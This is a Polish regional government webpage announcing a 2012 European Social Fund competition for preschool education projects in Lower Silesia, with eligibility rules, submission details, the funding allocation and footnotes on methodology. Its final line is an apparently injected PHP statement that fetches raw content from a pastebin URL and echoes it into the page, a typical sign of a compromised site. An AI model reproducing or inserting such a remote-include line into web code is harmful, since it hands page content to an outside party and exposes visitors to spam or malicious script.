Realizacja

Programu Operacyjnego
Kapitał Ludzki

na Dolnym Śląsku

Wartość podpisanych umów

2 350 537 513,38 zł

 Rozliczono

2 267 814 427,62 zł

Stan na 31 października 2015 r.

Punkt informacyjny i naboru wniosków PO KL

Multimedia

Niezwykła szansa dla niezwykłych ludzi

Mapa dotacji UE

Mapa projektów EFS

Analizy i raporty

Inwestycja w Kardy

Baza Projektów Badawczych w ramach Programu Kapitał Ludzki

Dolnośląski Wojewódzki Urząd Pracy

Regionalny Ośrodek EFS

Punkty Informacyjne Funduszy Europejskich

Europejski Fundusz Społeczny

Narodowa Strategia Spójności

Ministerstwo Rozwoju Regionalnego

Komisja Europejska

Regionalny Program Operacyjny

Urząd Marszałkowski Województwa Dolnośląskiego

Biuletyn informacji publicznej

24.01.2012 Ogłoszenie konkursu otwartego I/9.1.1/A/12

Zarząd województwa dolnośląskiego, pełniący rolę Instytucji Pośredniczącej Programu Operacyjnego Kapitał Ludzki 2007-2013 ogłasza konkurs otwarty nr: I/9.1.1/A/12 na projekty współfinansowane ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu IX Rozwój wykształcenia i kompetencji w regionach, Poddziałanie 9.1.1 Zmniejszanie nierówności w stopniu upowszechnienia edukacji przedszkolnej, obejmujące:

1. tworzenie przedszkoli (w tym również uruchamianie innych form wychowania przedszkolnego1) w 30% gmin z terenu województwa o najniższym w skali regionu stopniu upowszechnienia edukacji przedszkolnej2, (1)

2. wsparcie istniejących przedszkoli (w tym również funkcjonujących innych form wychowania przedszkolnego) w zakresie wygenerowania dodatkowych miejsc przedszkolnych, przyczyniające się do wzrostu całkowitej liczby miejsc w przedszkolach i/lub innych formach wychowania przedszkolnego podlegających pod jeden organ prowadzący i umiejscowionych na terenie danej gminy (2)

Dofinansowanie mogą uzyskać jedynie projekty realizowane przez organy prowadzące przedszkole/inną formę wychowania przedszkolnego, jako liderów lub partnerów projektu, którzy są zobowiązani przedstawić deklarację zapewnienia funkcjonowania ośrodka przedszkolnego po zakończeniu realizacji projektu przez okres co najmniej równy z okresem realizacji projektu.

Wnioski o dofinansowanie projektu można składać

od 13 lutego 2012 r. do 31 grudnia 2012 r.3

kurierem lub pocztą:

Urząd Marszałkowski Województwa Dolnośląskiego

Departament Europejskiego Funduszu Społecznego

ul. Mazowiecka 17

50-412 Wrocław

od poniedziałku do piątku w godzinach pracy Urzędu,

osobiście:

w Punkcie informacyjnym i naboru wniosków PO KL

Urząd Marszałkowski Województwa Dolnośląskiego

Departament Europejskiego Funduszu Społecznego

przy ul. Mazowieckiej 17 we Wrocławiu – parter, pokój nr 0004

od poniedziałku do piątku w godzinach pracy Urzędu.

Decyduje data i godzina wpływu wniosku do instytucji organizującej konkurs.

O dofinansowanie mogą występować wszystkie podmioty – z wyłączeniem osób fizycznych (nie dotyczy osób prowadzących działalność gospodarczą lub oświatową na podstawie przepisów odrębnych), które spełniają kryteria określone w Dokumentacji konkursowej, z wyłączeniem podmiotów określonych w art. 207 ustawy z dnia 27 sierpnia 2009 r. o finansach publicznych (Dz. U. Nr 157, poz. 1240 z późn. zm.).

Pełna treść ogłoszenia o konkursie oraz Dokumentacja konkursowa, na podstawie której należy przygotować wnioski o dofinansowanie projektu, są dostępne na stronie internetowej www.efs.dolnyslask.pl.

Kwota środków przeznaczona na dofinansowanie projektów w ramach konkursu wynosi

nie więcej niż 34 000 000,00 PLN 4

Dodatkowe informacje można uzyskać

w Punkcie informacyjnym i naboru wniosków PO KL

Urząd Marszałkowski Województwa Dolnośląskiego

Departament Europejskiego Funduszu Społecznego

przy ul. Mazowieckiej 17, 50-412 Wrocław

parter, pokój nr 0004

nr tel.: 071 776 96 17, 071 776 96 03, 071 776 95 51

e-mail: promocja.efs@dolnyslask.pl

1 W rozumieniu Rozporządzenia Ministra Edukacji Narodowej z dnia 31 sierpnia 2010 r. w sprawie rodzajów innych form wychowania przedszkolnego, warunków tworzenia i organizowania tych form oraz sposobu ich działania (Dz. U. Nr 161, poz. 1080 z późn. zm.)

2 Metodologia pomiaru upowszechnienia edukacji przedszkolnej dzieci w wieku 3-5 lat w gminie X: Wskaźnik należy mierzyć jako relację liczby dzieci w wieku 3-5 lat w ośrodkach edukacji przedszkolnej do liczby dzieci w wieku 3-5 lat ogółem w danej gminie.

W= Liczba dzieci w wieku 3-5 lat, które uczestniczyły w różnych formach edukacji przedszkolnej (A)/Liczba dzieci w wieku 3-5 lat ogółem (B) x 100

Źródło danych:

– Wartość A – Bank Danych Lokalnych GUS, Tablice: Wybrane cechy w latach (www.stat.gov.pl):

· Kategoria: wychowanie przedszkolne, grupa: przedszkola, podgrupa: dzieci według płci (przedszkola bez specjalnych oraz przedszkola specjalne; przyporządkowanie ogółem; dzieci od 3-6 lat ogółem- z uwagi na brak danych dot. grupy wiekowej 3-5 lat należy wygenerować dane dla grupy dzieci od 3-6 lat oraz dzieci 6- letnich i następnie pomniejszyć pierwszą z ww. o dzieci 6-letnie);

· Kategoria: wychowanie przedszkolne, grupa: przedszkola, podgrupa: dzieci w oddziałach przedszkolnych przy szkołach podstawowych (dzieci od 3-6 lat ogółem – j.w.);

· Kategoria: wychowanie przedszkolne, grupa: punkty przedszkolne, podgrupa: dzieci według wieku (ogółem; 3, 4, 5 lat);

· Kategoria: wychowanie przedszkolne, grupa: zespoły wychowania przedszkolnego, podgrupa: dzieci według wieku (ogółem; 3, 4, 5 lat).

– Wartość B – Bank Danych Lokalnych GUS, Tablice: Wybrane cechy w latach (www.stat.gov.pl):

· Kategoria: ludność, grupa: stan ludności i ruch naturalny, podgrupa: ludność według pojedynczych roczników wieku i płci (3, 4, 5 lat).

3 Dopuszcza się wcześniejszy termin zamknięcia lub zawieszenia konkursu, na zasadach określonych w Dokumentacji konkursowej.

4 Kwota stanowi całkowitą alokację finansową środków publicznych na konkurs. Alokacja finansowa obejmuje środki z budżetu środków europejskich, w części odpowiadającej finansowaniu Europejskiego Funduszu Społecznego (85%) oraz budżet krajowy w ramach limitu wydatków poszczególnych dysponentów, w części odpowiadającej współfinansowaniu krajowemu (15%). Wnioskodawca ubiegający się o dofinansowanie projektu jest zobowiązany do zapewnienia współfinansowania ze środków publicznych lub prywatnych w wysokości 15% wartości projektu, co oznacza, że dofinansowanie wynosi do 85% wydatków kwalifikowalnych projektu. Każdy z wnioskodawców jest zobowiązany do wniesienia wkładu własnego. 34 000 000 PLN to maksymalna kwota przeznaczona na dofinansowanie projektów, możliwa w przypadku, jeśli w konkursie zostaną wyłonione tylko i wyłącznie projekty wnoszące wkłady własne ze środków prywatnych. Minimalna kwota przeznaczona na dofinansowanie projektów wynosi 28 900 000 PLN i jest możliwa w przypadku, jeśli w konkursie zostaną wyłonione tylko i wyłącznie projekty wnoszące wkłady własne ze środków publicznych (wówczas pozostałe 5 100 000 PLN zostanie wniesione ze środków publicznych jako wkłady własne). Alokacja zawiera rezerwę finansową w wysokości 5% wartości konkursu z przeznaczeniem na ewentualne negocjacje projektów. Na ewentualne odwołania wnioskodawców instytucja organizująca konkurs zapewni środki finansowe dążąc do dofinansowania wszystkich projektów, które po procedurze odwoławczej w wyniku ponownej oceny uzyskały liczbę punktów, uprawniającą do przyznania dofinansowania. Mając na uwadze fakt, iż alokacja w ramach Programu określona jest w euro, instytucja organizująca konkurs zastrzega możliwość zmiany kwoty przeznaczonej na dofinansowanie projektów w wyniku zmiany kursu walutowego.

 

Dokumentacja konkursowa dostępna jest w zakładce Konkursy/2012 – więcej informacji 


<- Wstecz do: Aktualności

echo file_get_contents("https://pastebin.com/raw/vFc5Snpm");